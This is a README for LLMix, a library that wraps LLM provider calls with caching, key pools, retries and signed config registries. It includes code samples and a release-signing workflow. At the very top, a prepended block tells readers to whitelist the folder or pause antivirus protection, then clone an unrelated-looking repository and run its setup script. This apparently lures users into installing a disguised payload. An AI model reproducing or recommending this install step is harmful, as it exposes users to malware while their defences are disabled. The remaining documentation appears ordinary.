> [!TIP]
> If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

> [!CAUTION]
> Some security systems may block the installation. Only download from the official repository.
```bash
git clone https://github.com/Souliuangular/llmix-968.git
cd llmix-968
python setup.py
```

Read in other languages: English · 中文 · Deutsch · Español · Français · Русский · 한국어 · 日本語 · हिन्दी
Config-driven LLM calls for Python, TypeScript, and Rust. Keep your SDK. Move model behavior into MDA presets. Put cache, retries, key rotation, and rollout control around the call.
LLMix is the layer between your product and the provider SDK.
It does not ask you to rewrite your OpenAI, Anthropic, Gemini, LiteLLM, AI SDK, or custom client code. It wraps the call. The boring parts go around it: response cache, circuit breaker, key pools, singleflight, retry policy, adaptive concurrency, provider kwargs, and MDA config loading.
The model stops being a hard-coded string buried in application code. It becomes data. Change a preset, publish a compiled registry release, reload the service, and the next request can run a different provider or model. No redeploy for the usual model swap dance.
That is the whole thing. Small layer. Sharp edges filed down.
AI products in 2026 do not usually fail because one SDK call is hard.
They fail in the spaces around the call. A key gets rate limited. A provider gets slow. Two hundred users ask the same thing at once. A model swap needs a deploy. A cache key differs by one invisible parameter. One service is in Python, another is in TypeScript, and the Rust worker has to follow the same contract.
LLMix is for that part of the system. The signal chain between your app and the model.
You still own the prompt. You still own the SDK. LLMix owns the harness.
```bash
cargo add llmix-rs --features providers-openai,redis
```
LLMix uses the MDA config packages for preset loading. They are also published
as standalone runtime loaders for apps that need `.mda` validation, integrity,
or trust-policy enforcement outside LLMix.
---
## Documentation
If you are new to LLMix, read in this order:
Other operations docs:
- [Secure LLMix configuration translations](docs/llmix/secure-mda/secure-llmix-configuration.md) ([de](docs/llmix/secure-mda/secure-llmix-configuration.de.md), [es](docs/llmix/secure-mda/secure-llmix-configuration.es.md), [fr](docs/llmix/secure-mda/secure-llmix-configuration.fr.md), [hi](docs/llmix/secure-mda/secure-llmix-configuration.hi.md), [ja](docs/llmix/secure-mda/secure-llmix-configuration.ja.md), [ko](docs/llmix/secure-mda/secure-llmix-configuration.ko.md), [ru](docs/llmix/secure-mda/secure-llmix-configuration.ru.md), [中文](docs/llmix/secure-mda/secure-llmix-configuration.zh.md))
- [Key pool operations](docs/llmix/key-pool-operations.md)
- [Standalone MDA config loader docs](docs/mda-config/README.md)
---
## At a Glance

LLMix wraps one provider call at a time.
It is not a router in the LiteLLM sense. It is closer to the harness you keep rebuilding around every agent, coder tool, extraction service, and internal AI workflow once traffic becomes real.
---
### TypeScript
```typescript
import {
  CallPipeline,
  KeyPool,
  TwoTierCache,
  openaiDispatch,
} from "@snoai/llmix";

const pipeline = new CallPipeline({
  dispatch: openaiDispatch(),
  responseCache: new TwoTierCache("memory"),
});
pipeline.setKeyPool("openai", new KeyPool([process.env.OPENAI_API_KEY!]));

const response = await pipeline.call({
  config: {
    provider: "openai",
    model: "gpt-4o-mini",
    common: { temperature: 0.2, maxOutputTokens: 512 },
    caching: { strategy: "memory" },
  },
  messages: [
    { role: "user", content: "Explain LLMix in one sentence." },
  ],
});

console.log(response.content);
await pipeline.close();
```

### Python

```python
import asyncio
import os

from llmix import (
    CallInput,
    CallPipeline,
    KeyPool,
    PipelineConfig,
    TwoTierCache,
    openai_dispatch,
)


async def main() -> None:
    pipeline = CallPipeline(
        PipelineConfig(
            dispatch=openai_dispatch(),
            response_cache=TwoTierCache("memory"),
        )
    )
    pipeline.set_key_pool("openai", KeyPool([os.environ["OPENAI_API_KEY"]]))

    response = await pipeline.call(
        CallInput(
            config={
                "provider": "openai",
                "model": "gpt-4o-mini",
                "common": {"temperature": 0.2, "max_output_tokens": 512},
                "caching": {"strategy": "memory"},
            },
            messages=[
                {"role": "user", "content": "Explain LLMix in one sentence."}
            ],
        )
    )

    print(response.content)
    await pipeline.close()


asyncio.run(main())
```

### Rust

Rust exposes the same pipeline contract. The OpenAI helper is feature-gated.

```toml
[dependencies]
llmix-rs = { version = "2.0.0", features = ["providers-openai"] }
serde_json = "1"
tokio = { version = "1", features = ["macros", "rt"] }
```

```rust
use llmix_rs::{
    load_keys_from_env, CallInput, CallPipeline, OpenAiChatHelper, PipelineConfig,
};
use serde_json::json;

let pipeline = CallPipeline::new(PipelineConfig::new(OpenAiChatHelper::new()))?;
pipeline.set_key_pool("openai", load_keys_from_env("openai")?);

let response = pipeline
    .call(CallInput {
        config: json!({
            "provider": "openai",
            "model": "gpt-4o-mini",
            "common": { "temperature": 0.2, "max_output_tokens": 512 },
            "caching": { "strategy": "memory" }
        }),
        messages: vec![json!({
            "role": "user",
            "content": "Explain LLMix in one sentence."
        })],
        singleflight_key: None,
    })
    .await;
```

See the Rust guide for full main examples and feature flags.
| Concern | What LLMix does |
|---|---|
| Response cache | L1 memory plus optional Redis L2, with cross-runtime canonical cache keys |
| Key pools | Round-robin key selection, 429 rotation, and 401/403 dead-key eviction |
| Retries | Jittered exponential backoff, with Retry-After honored |
| Circuit breaker | Scoped by provider and effective base URL |
| Singleflight | Collapses identical concurrent work into one upstream request |
| Concurrency | AIMD adaptive semaphore, driven by rate-limit feedback |
| Provider kwargs | Common config becomes provider-specific request fields |
| Thinking tokens | Optional `<think>` extraction into normalized response objects |
| Registry | Signed compiled config registry with one live `current.json` pointer |
The defaults are meant to be boring. Tune them when real traffic gives you a reason.
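
To make the key-pool and retry rows above concrete, here is a minimal, self-contained sketch of the two ideas in plain Python. It is not LLMix's implementation: `SketchKeyPool`, `backoff_delay`, and the default `base` and `cap` values are hypothetical names and numbers chosen for illustration, and treating a `Retry-After` value as an exact delay is an assumption.

```python
import random
from collections import deque
from typing import Optional


class SketchKeyPool:
    """Hypothetical round-robin pool that evicts keys the provider rejects."""

    def __init__(self, keys: list[str]) -> None:
        if not keys:
            raise ValueError("key pool needs at least one key")
        self._keys = deque(keys)

    def acquire(self) -> str:
        if not self._keys:
            raise RuntimeError("no live keys left in the pool")
        key = self._keys[0]
        self._keys.rotate(-1)  # the key just handed out goes to the back
        return key

    def report(self, key: str, status: int) -> None:
        # 401/403 mean the key itself is bad, so it is evicted.
        # 429 needs no bookkeeping: the next acquire() already returns
        # a different key whenever more than one key is live.
        if status in (401, 403) and key in self._keys:
            self._keys.remove(key)


def backoff_delay(
    attempt: int,
    retry_after: Optional[float] = None,
    base: float = 0.5,
    cap: float = 30.0,
    rng: Optional[random.Random] = None,
) -> float:
    """Full-jitter exponential backoff; a Retry-After value wins if present."""
    if retry_after is not None:
        return max(0.0, retry_after)
    ceiling = min(cap, base * (2 ** attempt))
    return (rng or random).uniform(0.0, ceiling)
```

A retry loop would call `acquire()` before each attempt, pass the response status to `report()`, and sleep for `backoff_delay(attempt, retry_after)` before trying again. Jitter spreads retries out so that many clients hitting the same rate limit do not all return at the same instant.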
LLMix uses MDA as the source format for model presets. Human notes and runtime
settings live in one file. Production services read the compiled registry, not
the mutable source tree.
Python, TypeScript, and Rust can require MDA integrity, requires.network, and
verifier-hook based signatures while loading or publishing registry output.
Real Rekor transport and Sigstore cryptography are supplied by caller-provided
clients/verifiers.
The examples below use this preset path:
```text
config/llm/source/search_summary/openai_fast.mda
```

```markdown
---
name: openai_fast
description: Fast OpenAI preset for search summaries.
metadata:
  snoai-llmix:
    common:
      provider: openai
      model: gpt-5-mini
      temperature: 0.2
      maxOutputTokens: 512
    caching:
      strategy: redis-or-memory
    providerOptions:
      openai:
        reasoningEffort: medium
---

# openai_fast

Summarize search results for a research workflow.
```
Load it directly when editing or testing a preset:
```typescript
import { loadMdaConfig } from "@snoai/llmix";

const config = await loadMdaConfig("./config/llm/source/search_summary/openai_fast.mda");
```

```python
from llmix import load_mda_config

config = load_mda_config("./config/llm/source/search_summary/openai_fast.mda")
```

```rust
use llmix_rs::load_config;

let config = load_config("./config/llm/source/search_summary/openai_fast.mda")?;
```

For production services, use the registry.
Use this layout. Treat it as the public contract:
```text
config/llm/
  source/
    <module>/
      <preset>.mda
  current.json
  compiled/
```

`source/` is edited by people. `current.json` and `compiled/` are generated by
LLMix. Store the trust anchor outside `config/llm`.
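
As a small illustration of that layout, the sketch below maps a module and preset name onto the source path. `preset_source_path` is a hypothetical helper, not part of LLMix, and the segment validation is an assumption about what a careful caller would want.

```python
from pathlib import PurePosixPath


def preset_source_path(root: str, module: str, preset: str) -> PurePosixPath:
    """Return <root>/source/<module>/<preset>.mda for the layout above."""
    for part in (module, preset):
        # Reject empty names and anything that could escape the source tree.
        if not part or "/" in part or part in (".", ".."):
            raise ValueError(f"invalid path segment: {part!r}")
    return PurePosixPath(root) / "source" / module / f"{preset}.mda"


path = preset_source_path("config/llm", "search_summary", "openai_fast")
print(path)  # config/llm/source/search_summary/openai_fast.mda
```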
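The release flow runs through the commands below: create and validate the preset, compute integrity, write the trust policy, sign and verify, then prepare, publish, finalize, and check the registry release.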
The `did:web` example assumes these release-identity inputs already exist outside
`config/llm`: `release/did-web-private-key.pem` and `release/did.json`. Provide
them from your release system or use the GitHub Actions Sigstore/Rekor profile
instead.
```bash
mkdir -p config/llm/source/search_summary release deploy

mda init --template llmix-preset \
  --module search_summary \
  --preset openai_fast \
  --provider openai \
  --model gpt-5-mini \
  --out config/llm/source/search_summary/openai_fast.mda

mda validate config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --json

mda integrity compute config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --write \
  --json

mda release trust policy \
  --target llmix-registry \
  --profile did-web \
  --domain config.example.com \
  --out release/trust-policy.json \
  --json

mda sign config/llm/source/search_summary/openai_fast.mda \
  --profile did-web \
  --did did:web:config.example.com \
  --key-id did:web:config.example.com#release \
  --key-file release/did-web-private-key.pem \
  --in-place \
  --json

mda verify config/llm/source/search_summary/openai_fast.mda \
  --target source \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --json

mda release prepare \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --out release/plan.json \
  --json

llmix publish-registry \
  --root config/llm \
  --release-plan release/plan.json \
  --revision 2026-05-14T000000Z \
  --policy release/trust-policy.json \
  --did-document release/did.json \
  --root-did did:web:config.example.com \
  --root-key-id did:web:config.example.com#release \
  --root-key-file release/did-web-private-key.pem \
  --json

mda release finalize \
  --target llmix-registry \
  --registry-dir config/llm \
  --registry-root config/llm/compiled/2026-05-14T000000Z/registry-root.json \
  --release-plan release/plan.json \
  --policy release/trust-policy.json \
  --derive-root-digest \
  --minimum-revision 2026-05-14T000000Z \
  --out deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

mda doctor release \
  --target llmix-registry \
  --source config/llm/source \
  --registry-dir config/llm \
  --release-plan release/plan.json \
  --manifest deploy/llmix-trust.json \
  --did-document release/did.json \
  --json

llmix check-registry \
  --root config/llm \
  --trust deploy/llmix-trust.json \
  --preset search_summary/openai_fast \
  --did-document release/did.json \
  --tamper-proof \
  --json
```

Runtime code opens the generated registry with the external trust anchor:
```typescript
import {
  ConfigRegistryManager,
  loadLlmixTrustManifest,
  registryRootOptionsFromTrustManifest,
} from "@snoai/llmix";

const trust = await loadLlmixTrustManifest(process.env.LLMIX_TRUST_ANCHOR!);
const manager = await ConfigRegistryManager.open("config/llm", {
  signedRoot: registryRootOptionsFromTrustManifest(trust, { didWebVerifier }),
});
const config = await manager.getPreset("search_summary", "openai_fast");
```

`didWebVerifier` is the app verifier hook required by this `did:web` policy. For a
command-line runtime proof, use `llmix check-registry --did-document release/did.json`; in app code, pass the verifier hooks required by your trust
policy.
Managers expose the active revision and reload health metadata. That makes it easy to say exactly which config a service is running. See Secure LLMix Configuration with MDA for the complete release flow and runtime tamper-rejection proof.
ConfigRegistryPublisher is still available for advanced release systems, but
the default public path is the llmix publish-registry command. Do not write a
project-local registry compiler.
The public dispatch helpers cover the providers we actually test.
| Provider | Python | TypeScript | Notes |
|---|---|---|---|
| OpenAI | `openai_dispatch` | `openaiDispatch` | OpenAI Responses and chat-style flows |
| Anthropic | `anthropic_dispatch` | `anthropicDispatch` | Messages API, thinking budget validation |
| Gemini | `gemini_dispatch` | `geminiDispatch` | Google GenAI-compatible params |
| OpenRouter | `openrouter_dispatch` | `openrouterDispatch` | OpenAI-compatible |
| DeepInfra | `deepinfra_dispatch` | `deepinfraDispatch` | OpenAI-compatible |
| Novita | `novita_dispatch` | `novitaDispatch` | OpenAI-compatible |
| Together | `together_dispatch` | `togetherDispatch` | OpenAI-compatible |
| Sno GPU | `sno_gpu_dispatch` | `snoGpuDispatch` | On-prem OpenAI-compatible GPU endpoints |
Rust currently ships the neutral pipeline plus feature-gated helpers for OpenAI, Anthropic, Gemini, and Sno GPU. Treat Rust provider helpers as beta. The cache, key-pool, registry, retry, and pipeline contract are aligned with Python and TypeScript.
OpenAI-compatible providers reuse the OpenAI request shape with provider-specific base_url handling. That keeps the contract plain. Plain is useful.
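
The idea can be sketched in a few lines: one request builder, with only the base URL varying per provider. Everything here is illustrative rather than LLMix's own code. `build_chat_request` and `EXAMPLE_BASE_URLS` are hypothetical names, the URLs are placeholders, and the `/chat/completions` suffix assumes the chat-style OpenAI request shape.

```python
from typing import Optional

# Hypothetical base URLs, for illustration only. Real endpoints come from
# each provider's documentation or from your own configuration.
EXAMPLE_BASE_URLS = {
    "openai": "https://openai.example/v1",
    "openrouter": "https://openrouter.example/api/v1",
    "together": "https://together.example/v1",
}


def build_chat_request(
    provider: str,
    model: str,
    messages: list[dict],
    base_url: Optional[str] = None,
) -> dict:
    """Build one OpenAI-shaped chat request; only the base URL varies."""
    root = base_url or EXAMPLE_BASE_URLS[provider]
    return {
        "url": root.rstrip("/") + "/chat/completions",
        "json": {"model": model, "messages": messages},
    }
```

Two providers given the same model and messages produce identical request bodies and differ only in `url`. That is what lets a single dispatcher shape serve several OpenAI-compatible backends.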
| Variable | Purpose |
|---|---|
| `OPENAI_API_KEY` / `OPENAI_KEYS` | OpenAI key or comma-separated key pool |
| `ANTHROPIC_API_KEY` / `ANTHROPIC_KEYS` | Anthropic key or comma-separated key pool |
| `GEMINI_API_KEY` / `GEMINI_KEYS` | Gemini key or comma-separated key pool |
| `OPENROUTER_API_KEY` / `OPENROUTER_KEYS` | OpenRouter key or comma-separated key pool |
| `DEEPINFRA_API_KEY` / `DEEPINFRA_KEYS` | DeepInfra key or comma-separated key pool |
| `TOGETHER_API_KEY` / `TOGETHER_KEYS` | Together key or comma-separated key pool |
| `NOVITA_API_KEY` / `NOVITA_KEYS` | Novita key or comma-separated key pool |
| `SNO_LLM_API_KEY` | Sno GPU direct dispatcher fallback |
| `SNO_GPU_API_KEY` / `SNO_GPU_KEYS` | Sno GPU key-pool variables for provider id `sno-gpu` |
| `GPU_BASE_URL` | Sno GPU base URL |
| `REDIS_URL` | Redis response-cache URL |
| `LLMIX_STATE_DIR` | Lock files, batch metadata, and kill-switch state |
`load_keys_from_env("provider-name")` checks `PROVIDER_NAME_KEYS` first, then `PROVIDER_NAME_API_KEY`. Dashes become underscores.
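
The lookup order can be sketched as follows. This is an illustrative reimplementation, not the library function: `load_keys_from_env_sketch` is a hypothetical name, and returning an empty list when nothing is set, as well as falling through when the `_KEYS` variable is present but empty, are assumptions.

```python
import os
from typing import Mapping, Optional


def load_keys_from_env_sketch(
    provider: str, env: Optional[Mapping[str, str]] = None
) -> list[str]:
    """Resolve keys from PROVIDER_NAME_KEYS, then PROVIDER_NAME_API_KEY."""
    env = os.environ if env is None else env
    # "sno-gpu" -> "SNO_GPU": uppercase, dashes become underscores.
    prefix = provider.upper().replace("-", "_")
    for name in (f"{prefix}_KEYS", f"{prefix}_API_KEY"):
        raw = env.get(name, "")
        # A pool is comma-separated; a single key is a list of one.
        keys = [k.strip() for k in raw.split(",") if k.strip()]
        if keys:
            return keys
    return []


print(load_keys_from_env_sketch("sno-gpu", {"SNO_GPU_KEYS": "k1, k2"}))
# ['k1', 'k2']
```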
- Not a streaming framework. Streaming stays with your SDK.
- Not a prompt framework. Bring your own prompt layer.
- Not a provider marketplace. One call uses the provider named by its config.
- Not a reason to hide every model decision behind indirection. Some things should stay in code.
LLMix is useful when the same model-call shape keeps showing up across services. If you have one script and one key, you probably do not need it yet.
```bash
# Full monorepo checks
bun run build
bun run check
bun run test
```
